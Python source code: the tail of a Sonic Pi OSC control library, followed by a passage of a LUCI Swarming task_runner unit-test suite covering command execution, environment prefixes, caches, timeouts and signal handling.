if len(parameters) > 0: parameter = ',' + ','.join(parameters)
if type(sample) == Sample:
command = 'sample :{0}{1}'.format(sample.name, parameter)
else:
command = 'sample "{0}"{1}'.format(sample, parameter)
_debug('sample command={}'.format(command))
synth_server.sample(command)
def sleep(duration):
"""
the same as time.sleep
:param duration:
:return:
"""
synth_server.sleep(duration)
_debug('sleep', duration)
def one_in(max):
"""
random function returns True in one of max cases
:param max:
:return: boolean
"""
return random.randint(1, max) == 1
def chord(root_note, chord_quality):
"""
Generates a list of notes of a chord
:param root_note:
:param chord_quality:
:return: list
"""
result = []
n = root_note
half_tone_steps = _CHORD_QUALITY[chord_quality]
for i in half_tone_steps:
n = n + i
result.append(n)
return result
def scale(root_note, scale_mode, num_octaves=1):
"""
Genarates a liste of notes of scale
:param root_note:
:param scale_mode:
:param num_octaves:
:return: list
"""
result = []
n = root_note
half_tone_steps = _SCALE_MODE[scale_mode]
for o in range(num_octaves):
n = root_note + o * 12
result.append(n)
for i in half_tone_steps:
n = n + i
result.append(n)
return result
def run(command):
synth_server.run(command)
def stop():
synth_server.stop()
def send_message(message, *parameter):
synth_server.send_message(message, *parameter)
## Compound classes ##
class Ring:
"""
ring buffer
"""
def __init__(self, data):
self.data = data
self.index = -1
def __iter__(self): # return Iterator
return self
def __next__(self): # return Iterator next element
self.index += 1
if self.index == len(self.data):
self.index = 0
return self.data[self.index]
def choose(self): # random choose
return random.choice(self.data)
## Connection classes ##
class SonicPi:
"""
Communiction to Sonic Pi
"""
UDP_IP = "127.0.0.1"
UDP_PORT = 4557
UDP_PORT_OSC_MESSAGE = 4559
GUI_ID = 'SONIC_PI_PYTHON'
RUN_COMMAND = "/run-code"
STOP_COMMAND = "/stop-all-jobs"
def __init__(self):
self.client = udp_client.UDPClient(SonicPi.UDP_IP, SonicPi.UDP_PORT)
self.client_for_messages = udp_client.UDPClient(SonicPi.UDP_IP, SonicPi.UDP_PORT_OSC_MESSAGE)
def sample(self, command):
self.run(command)
def play(self, command):
command = 'use_synth :{0}\n'.format(_current_synth.name) + command
self.run(command)
def synth(self, command):
self.run(command)
def sleep(self, duration):
time.sleep(duration)
def run(self, command):
self.send_command(SonicPi.RUN_COMMAND, command)
def stop(self):
self.send_command(SonicPi.STOP_COMMAND)
def test_connection(self):
# OSC::Server.new(PORT)
# abort("ERROR: Sonic Pi is not listening on #{PORT} - is it running?")
pass
def send_command(self, address, argument=''):
msg = osc_message_builder.OscMessageBuilder(address=address)
msg.add_arg('SONIC_PI_PYTHON')
if argument != "":
msg.add_arg(argument)
msg = msg.build()
self.client.send(msg)
def send_message(self,message, *parameters):
msg = osc_message_builder.OscMessageBuilder(message)
for p in parameters:
msg.add_arg(p)
msg = msg.build()
self.client_for_messages.send(msg)
class SonicPiNew:
"""
Communiction to Sonic Pi
"""
UDP_IP = "127.0.0.1"
UDP_PORT = 4559
def __init__(self):
self.client = udp_client.UDPClient(SonicPiNew.UDP_IP, SonicPiNew.UDP_PORT)
self.commandServer = SonicPi()
# x= 'live_loop :py do\n nv=sync "/SENDOSC"\n puts nv\n eval(nv[0])\nend'
# self.commandServer.run(x)
def set_OSC_receiver(self, source):
self.commandServer.run(source)
def send(self, address, *message):
msg = osc_message_builder.OscMessageBuilder(address)
for m in message:
msg.add_arg(m)
msg = msg.build()
self.client.send(msg)
def sample(self, command):
self.send(command)
def play(self, command):
self.send(command)
def sleep(self, duration):
time.sleep(duration)
synth_server = SonicPi()
## system functions ##
def _debug(*allargs): # simple debug function for working in different environments
if __debug: print(allargs)
if __name__ == '__main__':
use_synth(SAW)
play(C5, amp=2, pan=-1)
|
task_runner_test.py | #!/usr/bin/env vpython3
# coding=utf-8
# Copyright 2013 The LUCI Authors. All rights reserved.
# Use of this source code is governed under the Apache License, Version 2.0
# that can be found in the LICENSE file.
from __future__ import print_function
import base64
import datetime
import fnmatch
import json
import logging
import os
import random
import re
import signal
import string
import sys
import tempfile
import threading
import time
import unittest
import mock
import six
import test_env_bot_code
test_env_bot_code.setup_test_env()
CLIENT_DIR = os.path.normpath(
os.path.join(test_env_bot_code.BOT_DIR, '..', '..', '..', 'client'))
# Needed for local_caching, and others on Windows when symlinks are not enabled.
sys.path.insert(0, CLIENT_DIR)
# Needed for isolateserver_fake.
sys.path.insert(0, os.path.join(CLIENT_DIR, 'tests'))
from bot_code import bot_auth
from bot_code import remote_client
from bot_code import task_runner
from depot_tools import auto_stub
from depot_tools import fix_encoding
from libs import luci_context
from utils import file_path
from utils import fs
from utils import large
from utils import logging_utils
from utils import subprocess42
from utils import tools
import isolateserver_fake
import local_caching
import swarmingserver_bot_fake
def to_native_eol(s):
if six.PY3 and sys.platform == 'win32':
return s.replace('\n', '\r\n')
return s
def gen_task_id():
return ''.join([random.choice(string.digits) for _ in range(10)])
DISABLE_CIPD_FOR_TESTS = ['--cipd-enabled', 'false']
EXIT_CODE_TERM = -signal.SIGTERM
# Actually 0xc000013a, unsigned in python3 on windows
if sys.platform == 'win32':
if six.PY3:
EXIT_CODE_TERM = 3221225786
else:
EXIT_CODE_TERM = -1073741510
def get_manifest(script=None, isolated=None, **kwargs):
"""Returns a task manifest similar to what the server sends back to the bot.
Eventually this should be a proto message.
"""
isolated_input = isolated and isolated.get('input')
out = {
'bot_authenticated_as':
'foo',
'bot_id':
'localhost',
'caches': [],
'cipd_input': {},
'command': [sys.executable, '-u', '-c', script]
if not isolated_input else None,
'containment': {
'lower_priority': True,
'containment_type': 'NONE',
'limit_processes': 0,
'limit_total_committed_memory': 0,
},
'dimensions': {},
'env': {},
'env_prefixes': {},
'grace_period':
30.,
'hard_timeout':
10.,
'host':
'bar',
'io_timeout':
10.,
'isolated':
isolated,
'cas_input_root':
None,
'outputs': [],
'realm':
None,
'relative_cwd':
None,
'resultdb':
None,
'secret_bytes':
None,
'service_accounts':
None,
'task_id':
six.text_type(gen_task_id()),
}
out.update(kwargs)
return out
def get_task_details(*args, **kwargs):
return task_runner.TaskDetails(get_manifest(*args, **kwargs))
def run_command(server_url, work_dir, task_details, headers_cb):
"""Runs a command with an initialized client."""
remote = remote_client.createRemoteClient(server_url, headers_cb, 'localhost',
work_dir)
remote.bot_id = task_details.bot_id
with luci_context.stage(local_auth=None) as ctx_file:
return task_runner.run_command(remote, task_details, work_dir, 3600.,
time.time(), ['--min-free-space', '1'] +
DISABLE_CIPD_FOR_TESTS, '/path/to/file',
ctx_file)
def load_and_run(server_url, work_dir, manifest, auth_params_file):
"""Wraps task_runner.load_and_run() which runs a Swarming task."""
in_file = os.path.join(work_dir, 'task_runner_in.json')
with open(in_file, 'w') as f:
json.dump(manifest, f)
out_file = os.path.join(work_dir, 'task_runner_out.json')
task_runner.load_and_run(in_file, server_url, 3600., time.time(), out_file,
['--min-free-space', '1'] + DISABLE_CIPD_FOR_TESTS,
None, auth_params_file)
with open(out_file, 'rb') as f:
return json.load(f)
class FakeAuthSystem(object):
local_auth_context = None
def __init__(self, auth_params_file):
self._running = False
assert auth_params_file == '/path/to/auth-params-file'
def set_remote_client(self, _remote_client):
pass
def start(self):
assert not self._running
self._running = True
return self.local_auth_context
def stop(self):
self._running = False
def get_bot_headers(self):
assert self._running
return {'Fake': 'Header'}, int(time.time() + 300)
class TestTaskRunnerBase(auto_stub.TestCase):
def setUp(self):
super(TestTaskRunnerBase, self).setUp()
tools.clear_cache_all()
self.root_dir = six.ensure_text(tempfile.mkdtemp(prefix=u'task_runner'))
self.work_dir = os.path.join(self.root_dir, u'w')
# Create the logs directory so run_isolated.py can put its log there.
self.logs_dir = os.path.join(self.root_dir, u'logs')
os.chdir(self.root_dir)
os.mkdir(self.work_dir)
os.mkdir(self.logs_dir)
logging.info('Temp: %s', self.root_dir)
# Mock this since swarming_bot.zip is not accessible.
def _get_run_isolated():
return [sys.executable, '-u', os.path.join(CLIENT_DIR, 'run_isolated.py')]
self.mock(task_runner, 'get_run_isolated', _get_run_isolated)
# In case this test itself is running on Swarming, clear the bot
# environment.
os.environ.pop('LUCI_CONTEXT', None)
os.environ.pop('SWARMING_AUTH_PARAMS', None)
os.environ.pop('SWARMING_BOT_ID', None)
os.environ.pop('SWARMING_TASK_ID', None)
os.environ.pop('SWARMING_SERVER', None)
os.environ.pop('ISOLATE_SERVER', None)
# Make HTTP headers consistent
self.mock(remote_client, 'make_appengine_id', lambda *a: 42)
self._server = None
self._isolateserver = None
def tearDown(self):
os.chdir(test_env_bot_code.BOT_DIR)
try:
try:
if self._server:
self._server.close()
finally:
logging.debug(self.logs_dir)
for i in os.listdir(self.logs_dir):
with open(os.path.join(self.logs_dir, i), 'r') as f:
logging.debug('%s:\n%s', i, ''.join(' ' + line for line in f))
file_path.rmtree(self.root_dir)
except OSError:
print('Failed to delete %s' % self.root_dir, file=sys.stderr)
raise
finally:
super(TestTaskRunnerBase, self).tearDown()
@property
def server(self):
"""Lazily starts a Swarming fake bot API server."""
if not self._server:
self._server = swarmingserver_bot_fake.Server()
return self._server
@property
def isolateserver(self):
"""Lazily starts an isolate fake API server."""
if not self._isolateserver:
self._isolateserver = isolateserver_fake.FakeIsolateServer()
return self._isolateserver
def getTaskResults(self, task_id):
"""Returns a flattened task result."""
tasks = self.server.get_tasks()
self.assertEqual([task_id], sorted(tasks))
actual = swarmingserver_bot_fake.flatten_task_updates(tasks[task_id])
# Always decode the output;
if u'output' in actual:
actual[u'output'] = base64.b64decode(actual[u'output'])
return actual
def expectTask(self, task_id, **kwargs):
"""Asserts the task update sent by task_runner to the server.
It doesn't disambiguate individual task_update, so if you care about the
individual packets (like internal timeouts), check them separately.
Returns:
flattened task result as seen on the server, with output decoded.
"""
actual = self.getTaskResults(task_id)
out = actual.copy()
expected = {
u'bot_overhead': 0.,
u'cost_usd': 0.,
u'duration': 0.,
u'exit_code': 0,
u'hard_timeout': False,
u'id': u'localhost',
u'io_timeout': False,
u'isolated_stats': {
u'download': {
u'initial_number_items': 0,
u'initial_size': 0,
},
},
u'output': to_native_eol('hi\n').encode(),
u'output_chunk_start': 0,
u'task_id': task_id,
}
for k, v in kwargs.items():
if v is None:
expected.pop(k)
else:
expected[six.ensure_text(k)] = v
# Use explicit <= verification for these.
for k in (u'bot_overhead', u'cost_usd', u'duration'):
# Actual values must be equal or larger than the expected values.
if k in actual:
self.assertLessEqual(expected.pop(k), actual.pop(k))
# Use regexp if requested.
if hasattr(expected[u'output'], 'pattern'):
v = actual.pop(u'output')
r = expected.pop(u'output')
self.assertTrue(
r.match(v),
"failed to match output. pattern: %s, actual: %s" % (r.pattern, v))
for key, value in expected.get(u'isolated_stats', {}).items():
if 'isolated_stats' not in actual:
# expected but not actual.
break
if u'duration' in value:
v = actual[u'isolated_stats'][key].pop(u'duration')
self.assertLessEqual(value.pop(u'duration'), v)
# drop duration stats.
actual.pop(u'cache_trim_stats', None)
actual.pop(u'named_caches_stats', None)
actual.pop(u'cleanup_stats', None)
# Rest is explicit comparison.
self.assertEqual(expected, actual)
return out
def _run_command(self, task_details):
return run_command(self.server.url, self.work_dir, task_details, None)
class TestTaskRunner(TestTaskRunnerBase):
# Test cases that do not involve a timeout.
# These test cases run the command for real.
def _expect_files(self, expected):
# Confirm work_dir against a dict of expected files.
expected = expected[:]
for root, dirs, filenames in fs.walk(self.root_dir):
if 'logs' in dirs:
dirs.remove('logs')
for filename in filenames:
p = os.path.relpath(os.path.join(root, filename), self.root_dir)
for i, e in enumerate(expected):
if fnmatch.fnmatch(p, e):
expected.pop(i)
break
else:
self.fail((p, expected))
if expected:
self.fail(expected)
def test_run_command_raw(self):
task_details = get_task_details('print(\'hi\')')
expected = {
u'exit_code': 0,
u'hard_timeout': False,
u'io_timeout': False,
u'must_signal_internal_failure': None,
u'version': task_runner.OUT_VERSION,
}
self.assertEqual(expected, self._run_command(task_details))
# Now look at the updates sent by the bot as seen by the server.
self.expectTask(task_details.task_id)
def test_run_command_env_prefix_one(self):
task_details = get_task_details(
'import os\nprint(os.getenv("PATH").split(os.pathsep)[0])',
env_prefixes={
'PATH': ['./local/smurf', './other/thing'],
})
expected = {
u'exit_code': 0,
u'hard_timeout': False,
u'io_timeout': False,
u'must_signal_internal_failure': None,
u'version': task_runner.OUT_VERSION,
}
self.assertEqual(expected, self._run_command(task_details))
# Now look at the updates sent by the bot as seen by the server.
sep = re.escape(os.sep)
self.expectTask(
task_details.task_id,
output=re.compile(
(to_native_eol('.+%slocal%ssmurf\n$') % (sep, sep)).encode()))
def test_run_command_env_prefix_multiple(self):
task_details = get_task_details(
'\n'.join([
'import os',
'print(os.path.realpath(os.getcwd()))',
'path = os.getenv("PATH").split(os.pathsep)',
'print(os.path.realpath(path[0]))',
'print(os.path.realpath(path[1]))',
]),
env_prefixes={
'PATH': ['./local/smurf', './other/thing'],
})
expected = {
u'exit_code': 0,
u'hard_timeout': False,
u'io_timeout': False,
u'must_signal_internal_failure': None,
u'version': task_runner.OUT_VERSION,
}
self.assertEqual(expected, self._run_command(task_details))
# Now look at the updates sent by the bot as seen by the server.
sep = re.escape(os.sep)
output = re.compile(((r'^'
r'(?P<cwd>[^\n]*)\n'
r'(?P=cwd)%slocal%ssmurf\n'
r'(?P=cwd)%sother%sthing\n'
r'$') % (sep, sep, sep, sep)).encode())
if six.PY3 and sys.platform == 'win32':
output = re.compile(output.pattern.replace(br'\n', br'\r\n'))
self.expectTask(task_details.task_id, output=output)
def test_run_command_isolated(self):
# Hook run_isolated out to see that everything still work.
task_details = get_task_details(isolated={
'input': '123',
'server': 'localhost:1',
'namespace': 'default-gzip',
})
# Mock running run_isolated with a script.
SCRIPT_ISOLATED = ('import json, sys;\n'
'args = []\n'
'if len(sys.argv) != 3 or sys.argv[1] != \'-a\':\n'
' raise Exception(sys.argv)\n'
'with open(sys.argv[2], \'r\') as argsfile:\n'
' args = json.loads(argsfile.read())\n'
'if len(args) != 1:\n'
' raise Exception(args);\n'
'with open(args[0], \'w\') as f:\n'
' json.dump({\n'
' \'exit_code\': 0,\n'
' \'had_hard_timeout\': False,\n'
' \'internal_failure\': None,\n'
' \'outputs_ref\': {\n'
' \'isolated\': \'123\',\n'
' \'isolatedserver\': \'http://localhost:1\',\n'
' \'namespace\': \'default-gzip\',\n'
' },\n'
' \'cas_output_root\': None,\n'
' }, f)\n'
'sys.stdout.write(\'hi\\n\')')
self.mock(task_runner, 'get_run_isolated',
lambda: [sys.executable, '-u', '-c', SCRIPT_ISOLATED])
self.mock(
task_runner, 'get_isolated_args',
lambda work_dir, details, isolated_result, bot_file, run_isolated_flags:
[isolated_result])
expected = {
u'exit_code': 0,
u'hard_timeout': False,
u'io_timeout': False,
u'must_signal_internal_failure': None,
u'version': task_runner.OUT_VERSION,
}
self.assertEqual(expected, self._run_command(task_details))
# Now look at the updates sent by the bot as seen by the server.
self.expectTask(
task_details.task_id,
isolated_stats=None,
outputs_ref={
u'isolated': u'123',
u'isolatedserver': u'http://localhost:1',
u'namespace': u'default-gzip',
})
def test_run_command_fail(self):
task_details = get_task_details('import sys; print(\'hi\'); sys.exit(1)')
expected = {
u'exit_code': 1,
u'hard_timeout': False,
u'io_timeout': False,
u'must_signal_internal_failure': None,
u'version': task_runner.OUT_VERSION,
}
self.assertEqual(expected, self._run_command(task_details))
# Now look at the updates sent by the bot as seen by the server.
self.expectTask(task_details.task_id, exit_code=1)
def test_run_command_os_error(self):
task_details = get_task_details(
command=[
'executable_that_shouldnt_be_on_your_system',
'thus_raising_OSError',
])
expected = {
u'exit_code': 1,
u'hard_timeout': False,
u'io_timeout': False,
u'must_signal_internal_failure': None,
u'version': task_runner.OUT_VERSION,
}
self.assertEqual(expected, self._run_command(task_details))
# Now look at the updates sent by the bot as seen by the server.
pattern = (
# This is a beginning of run_isolate.py's output if binary is not
# found.
br'^<The executable does not exist, a dependent library is missing or '
br'the command line is too long>\n'
br'<Check for missing .so/.dll in the .isolate or GN file or length of '
br'command line args>')
if sys.platform == 'win32':
pattern = pattern.replace(br'\n', br'\r\n')
output = re.compile(pattern)
out = self.expectTask(task_details.task_id, exit_code=1, output=output)
self.assertGreater(10., out[u'cost_usd'])
def test_isolated_grand_children(self):
"""Runs a normal test involving 3 level deep subprocesses.
It is the equivalent of test_isolated_io_signal_grand_children() that fails,
this is the succeeding version.
"""
files = {
'parent.py':
(b'import subprocess, sys\n'
b'res = subprocess.call([sys.executable,\'-u\',\'children.py\'])\n'
b'sys.exit(res)\n'),
'children.py': (b'import subprocess, sys\n'
b'sys.exit(subprocess.call('
b'[sys.executable, \'-u\', \'grand_children.py\']))\n'),
'grand_children.py': b'print(\'hi\')',
}
isolated = json.dumps({
'files': {
name: {
'h':
self.isolateserver.add_content_compressed(
'default-gzip', content),
's':
len(content),
} for name, content in files.items()
},
}).encode()
isolated_digest = self.isolateserver.add_content_compressed(
'default-gzip', isolated)
manifest = get_manifest(
isolated={
'input': isolated_digest,
'namespace': 'default-gzip',
'server': self.isolateserver.url,
},
command=['python', 'parent.py'],
)
actual = load_and_run(self.server.url, self.work_dir, manifest, None)
expected = {
u'exit_code': 0,
u'hard_timeout': False,
u'io_timeout': False,
u'must_signal_internal_failure': None,
u'version': task_runner.OUT_VERSION,
}
self.assertEqual(expected, actual)
self.expectTask(
manifest['task_id'],
isolated_stats={
u'download': {
u'duration': 0.,
u'initial_number_items': 0,
u'initial_size': 0,
u'items_cold': u'eJzjDmaawAgAAq8A8g==',
u'items_hot': u'',
},
u'upload': {
u'duration': 0.,
u'items_cold': u'',
u'items_hot': u'',
},
})
def test_run_command_large(self):
# Method should have "self" as first argument - pylint: disable=E0213
class Popen(object):
"""Mocks the process so we can control how data is returned."""
def __init__(self2, _cmd, cwd, env, stdout, stderr, stdin, detached):
self.assertEqual(self.work_dir, cwd)
expected_env = os.environ.copy()
# In particular, foo=bar is not set here, it will be passed to
# run_isolated as an argument.
expected_env['LUCI_CONTEXT'] = env['LUCI_CONTEXT'] # tmp file
self.assertEqual(expected_env, env)
self.assertEqual(subprocess42.PIPE, stdout)
self.assertEqual(subprocess42.STDOUT, stderr)
self.assertEqual(subprocess42.PIPE, stdin)
self.assertEqual(True, detached)
self2._out = [
b'hi!\n',
b'hi!\n',
b'hi!\n' * 100000,
b'hi!\n',
]
if six.PY3 and sys.platform == 'win32':
self2._out = [out.replace(b'\n', b'\r\n') for out in self2._out]
def yield_any(self2, maxsize, timeout):
self.assertLess(0, maxsize())
self.assertLess(0, timeout())
for i in self2._out:
yield 'stdout', i
@staticmethod
def wait():
return 0
@staticmethod
def kill():
return True
self.mock(subprocess42, 'Popen', Popen)
task_details = get_task_details()
expected = {
u'exit_code': 0,
u'hard_timeout': False,
u'io_timeout': False,
u'must_signal_internal_failure': None,
u'version': task_runner.OUT_VERSION,
}
self.assertEqual(expected, self._run_command(task_details))
# Now look at the updates sent by the bot as seen by the server.
self.expectTask(
task_details.task_id,
bot_overhead=None,
isolated_stats=None,
output=to_native_eol('hi!\n' * 100003).encode())
# Here, we want to carefully check the packets sent to ensure the internal
# timer works as expected. There's 3 updates:
# - initial task startup with no output
# - buffer filled with the 3 first yield
# - last yield
updates = self.server.get_tasks()[task_details.task_id]
self.assertEqual(3, len(updates))
self.assertEqual(None, updates[0].get(u'output'))
self.assertEqual(base64.b64encode(
to_native_eol('hi!\n' * 100002).encode()), updates[1][u'output'].encode())
self.assertEqual(base64.b64encode(
to_native_eol('hi!\n').encode()), updates[2][u'output'].encode())
def test_run_command_caches(self):
# This test puts a file into a named cache, remove it, runs a test that
# updates the named cache, remaps it and asserts the content was updated.
#
# Directories:
# <root_dir>/
# <root_dir>/c - <cache_dir> named cache root
# <root_dir>/dest - <dest_dir> used for manual cache update
# <root_dir>/w - <self.work_dir> used by the task.
cache_dir = os.path.join(self.root_dir, u'c')
dest_dir = os.path.join(self.root_dir, u'dest')
policies = local_caching.CachePolicies(0, 0, 0, 0)
# Inject file 'bar' in the named cache 'foo'.
cache = local_caching.NamedCache(cache_dir, policies)
cache.install(dest_dir, 'foo')
with open(os.path.join(dest_dir, 'bar'), 'wb') as f:
f.write(b'thecache')
cache.uninstall(dest_dir, 'foo')
self.assertFalse(os.path.exists(dest_dir))
self._expect_files([u'c/*/bar', u'c/state.json'])
# Maps the cache 'foo' as 'cache_foo'. This runs inside self.work_dir.
# This runs the command for real.
script = ('import os\n'
'print("hi")\n'
'with open("cache_foo/bar", "r") as f:\n'
' cached = f.read()\n'
'with open("../../result", "w") as f:\n'
' f.write(cached)\n'
'with open("cache_foo/bar", "w") as f:\n'
' f.write("updated_cache")\n')
task_details = get_task_details(
script, caches=[{'name': 'foo', 'path': 'cache_foo', 'hint': '100'}])
expected = {
u'exit_code': 0,
u'hard_timeout': False,
u'io_timeout': False,
u'must_signal_internal_failure': None,
u'version': task_runner.OUT_VERSION,
}
self.assertEqual(expected, self._run_command(task_details))
self._expect_files([
u'c/*/bar',
u'c/state.json',
u'w/cas-cache/state.json',
u'w/cache/state.json',
u'result',
u'w/run_isolated_args.json',
])
# Ensure the 'result' file written my the task contained foo/bar.
with open(os.path.join(self.root_dir, 'result'), 'rb') as f:
self.assertEqual(b'thecache', f.read())
os.remove(os.path.join(self.root_dir, 'result'))
cache = local_caching.NamedCache(cache_dir, policies)
self.assertFalse(os.path.exists(dest_dir))
self._expect_files([
u'w/cas-cache/state.json',
u'c/*/bar',
u'c/state.json',
u'w/run_isolated_args.json',
u'w/cache/state.json',
])
cache.install(dest_dir, 'foo')
self._expect_files([
u'dest/bar',
u'c/state.json',
u'w/run_isolated_args.json',
u'w/cas-cache/state.json',
u'w/cache/state.json',
])
with open(os.path.join(dest_dir, 'bar'), 'rb') as f:
self.assertEqual(b'updated_cache', f.read())
cache.uninstall(dest_dir, 'foo')
self.assertFalse(os.path.exists(dest_dir))
# Now look at the updates sent by the bot as seen by the server.
self.expectTask(task_details.task_id)
def test_start_task_runner_fail_on_startup(self):
def _get_run_isolated():
return ['invalid_commad_that_shouldnt_exist']
self.mock(task_runner, 'get_run_isolated', _get_run_isolated)
with self.assertRaises(task_runner._FailureOnStart) as e:
task_runner._start_task_runner([], self.work_dir, None)
self.assertEqual(2, e.exception.exit_code)
def test_main(self):
def _load_and_run(manifest, swarming_server, cost_usd_hour, start,
json_file, run_isolated_flags, bot_file,
auth_params_file):
self.assertEqual('foo', manifest)
self.assertEqual(self.server.url, swarming_server)
self.assertEqual(3600., cost_usd_hour)
self.assertGreaterEqual(time.time(), start)
self.assertEqual('task_summary.json', json_file)
self.assertEqual(['--min-free-space', '1'], run_isolated_flags)
self.assertEqual('/path/to/bot-file', bot_file)
self.assertEqual('/path/to/auth-params-file', auth_params_file)
self.mock(task_runner, 'load_and_run', _load_and_run)
cmd = [
'--swarming-server',
self.server.url,
'--in-file',
'foo',
'--out-file',
'task_summary.json',
'--cost-usd-hour',
'3600',
'--start',
str(time.time()),
'--bot-file',
'/path/to/bot-file',
'--auth-params-file',
'/path/to/auth-params-file',
'--',
'--min-free-space',
'1',
]
self.assertEqual(0, task_runner.main(cmd))
class TestTaskRunnerKilled(TestTaskRunnerBase):
# These test cases run the command for real where the process is killed.
# TODO(maruel): Calculate this value automatically through iteration? This is
# really bad and prone to flakiness.
SHORT_TIME_OUT = 3.
# Here's a simple script that handles signals properly. Sadly SIGBREAK is not
# defined on posix.
SCRIPT_SIGNAL = ('import signal, sys, threading;\n'
'event = threading.Event();\n'
'def handler(signum, _):\n'
' event.set();\n'
' print(\'got signal %%d\' %% signum);\n'
' sys.stdout.flush();\n'
'signal.signal(signal.%s, handler);\n'
'print(\'hi\');\n'
'sys.stdout.flush();\n'
'while not event.is_set():\n'
' pass;\n'
'print(\'bye\');\n'
'sys.stdout.flush();') % ('SIGBREAK' if sys.platform ==
'win32' else 'SIGTERM')
SCRIPT_SIGNAL_HANG = ('import signal, sys, time, threading;\n'
'event = threading.Event();\n'
'def handler(signum, _):\n'
' event.set();\n'
' print(\'got signal %%d\' %% signum);\n'
' sys.stdout.flush();\n'
'signal.signal(signal.%s, handler);\n'
'print(\'hi\');\n'
'sys.stdout.flush();\n'
'while not event.is_set():\n'
' pass;\n'
'print(\'bye\');\n'
'sys.stdout.flush();\n'
'time.sleep(100);') % ('SIGBREAK' if sys.platform ==
'win32' else 'SIGTERM')
SCRIPT_HANG = 'import time; print(\'hi\'); time.sleep(100)'
def test_killed_early(self):
# The task is killed on first update, so it doesn't have the chance to do
# anything.
task_details = get_task_details('print(\'hi\')')
# task_runner is told to kill the task right on the first task update.
self.server.must_stop = True
expected = {
u'exit_code': -1,
u'hard_timeout': False,
u'io_timeout': False,
u'must_signal_internal_failure': None,
u'version': 3,
}
self.assertEqual(expected, self._run_command(task_details))
# Now look at the updates sent by the bot as seen by the server.
expected = {
u'id': u'localhost',
u'task_id': task_details.task_id,
u'canceled': True,
u'exit_code': -1
}
actual = self.getTaskResults(task_details.task_id)
self.assertLessEqual(0, actual.pop(u'cost_usd'))
self.assertEqual(expected, actual)
def test_killed_later(self):
# Case where a task started and a client asks the server to kill the task.
# In this case the task results in state KILLED.
# Make the task update a busy loop to reduce the duration of this test case.
self.mock(task_runner._OutputBuffer, '_MIN_PACKET_INTERVAL', 0.2)
self.mock(task_runner._OutputBuffer, '_MAX_PACKET_INTERVAL', 0.2)
# We need to 'prime' the server before starting the thread.
self.assertTrue(self.server.url)
task_details = get_task_details(
'import sys,time;sys.stdout.write(\'hi\\n\');time.sleep(100)')
# Cheezy but good enough.
def run():
# Wait until there's output.
while True:
self.server.has_updated_task.wait()
self.server.has_updated_task.clear()
if 'output' in self.getTaskResults(task_details.task_id):
self.server.must_stop = True
break
t = threading.Thread(target=run)
t.daemon = True
t.start()
expected = {
u'exit_code': EXIT_CODE_TERM,
u'hard_timeout': False,
u'io_timeout': False,
u'must_signal_internal_failure': None,
u'version': 3,
}
self.assertEqual(expected, self._run_command(task_details))
# Now look at the updates sent by the bot as seen by the server.
self.expectTask(task_details.task_id, exit_code=EXIT_CODE_TERM)
t.join()
def test_hard(self):
task_details = get_task_details(
self.SCRIPT_HANG, hard_timeout=self.SHORT_TIME_OUT)
expected = {
u'exit_code': EXIT_CODE_TERM,
u'hard_timeout': True,
u'io_timeout': False,
u'must_signal_internal_failure': None,
u'version': task_runner.OUT_VERSION,
}
self.assertEqual(expected, self._run_command(task_details))
# Now look at the updates sent by the bot as seen by the server.
self.expectTask(
task_details.task_id, hard_timeout=True, exit_code=EXIT_CODE_TERM)
def test_io(self):
task_details = get_task_details(
self.SCRIPT_HANG, io_timeout=self.SHORT_TIME_OUT)
expected = {
u'exit_code': EXIT_CODE_TERM,
u'hard_timeout': False,
u'io_timeout': True,
u'must_signal_internal_failure': None,
u'version': task_runner.OUT_VERSION,
}
self.assertEqual(expected, self._run_command(task_details))
# Now look at the updates sent by the bot as seen by the server.
self.expectTask(
task_details.task_id, io_timeout=True, exit_code=EXIT_CODE_TERM)
def test_hard_signal(self):
task_details = get_task_details(
self.SCRIPT_SIGNAL, hard_timeout=self.SHORT_TIME_OUT)
# Returns 0 because the process cleaned up itself.
expected = {
u'exit_code': 0,
u'hard_timeout': True,
u'io_timeout': False,
u'must_signal_internal_failure': None,
u'version': task_runner.OUT_VERSION,
}
self.assertEqual(expected, self._run_command(task_details))
# Now look at the updates sent by the bot as seen by the server.
self.expectTask(
task_details.task_id,
hard_timeout=True,
output=(to_native_eol('hi\ngot signal %d\nbye\n') %
task_runner.SIG_BREAK_OR_TERM).encode())
def test_io_signal(self):
task_details = get_task_details(
self.SCRIPT_SIGNAL, io_timeout=self.SHORT_TIME_OUT)
# Returns 0 because the process cleaned up itself.
expected = {
u'exit_code': 0,
u'hard_timeout': False,
u'io_timeout': True,
u'must_signal_internal_failure': None,
u'version': task_runner.OUT_VERSION,
}
self.assertEqual(expected, self._run_command(task_details))
# Now look at the updates sent by the bot as seen by the server.
# output_re='^hi\ngot signal %d\nbye\n$' % task_runner.SIG_BREAK_OR_TERM)
self.expectTask(
task_details.task_id,
io_timeout=True,
output=(to_native_eol('hi\ngot signal %d\nbye\n') %
task_runner.SIG_BREAK_OR_TERM).encode())
def test_hard_no_grace(self):
task_details = get_task_details(
self.SCRIPT_HANG,
hard_timeout=self.SHORT_TIME_OUT,
grace_period=self.SHORT_TIME_OUT)
expected = {
u'exit_code': EXIT_CODE_TERM,
u'hard_timeout': True,
u'io_timeout': False,
u'must_signal_internal_failure': None,
u'version': task_runner.OUT_VERSION,
}
self.assertEqual(expected, self._run_command(task_details))
# Now look at the updates sent by the bot as seen by the server.
self.expectTask(
task_details.task_id, hard_timeout=True, exit_code=EXIT_CODE_TERM)
@unittest.skipIf(
sys.platform == 'win32',
'As run_isolated is killed, the children process leaks')
def test_io_no_grace(self):
task_details = get_task_details(
self.SCRIPT_HANG,
io_timeout=self.SHORT_TIME_OUT,
grace_period=self.SHORT_TIME_OUT)
exit_code = -1 if sys.platform == 'win32' else -signal.SIGTERM
expected = {
u'exit_code': exit_code,
u'hard_timeout': False,
u'io_timeout': True,
u'must_signal_internal_failure': None,
u'version': task_runner.OUT_VERSION,
}
self.assertEqual(expected, self._run_command(task_details))
# Now look at the updates sent by the bot as seen by the server.
self.expectTask(task_details.task_id, io_timeout=True, exit_code=exit_code)
def test_hard_signal_no_grace(self):
task_details = get_task_details(
self.SCRIPT_SIGNAL_HANG, hard_timeout=self.SHORT_TIME_OUT,
grace_period=self.SHORT_TIME_OUT)
exit_code = 1 if sys.platform == 'win32' else -signal.SIGKILL
expected = {
u'exit_code': exit_code,
u'hard_timeout': True,
u'io_timeout': False,
u'must_signal_internal_failure': None,
u'version': task_runner.OUT_VERSION,
}
self.assertEqual(expected, self._run_command(task_details))
# Now look at the updates sent by the bot as seen by the server.
# output_re='^hi\ngot signal %d\nbye\n$' % task_runner.SIG_BREAK_OR_TERM)
self.expectTask(
task_details.task_id,
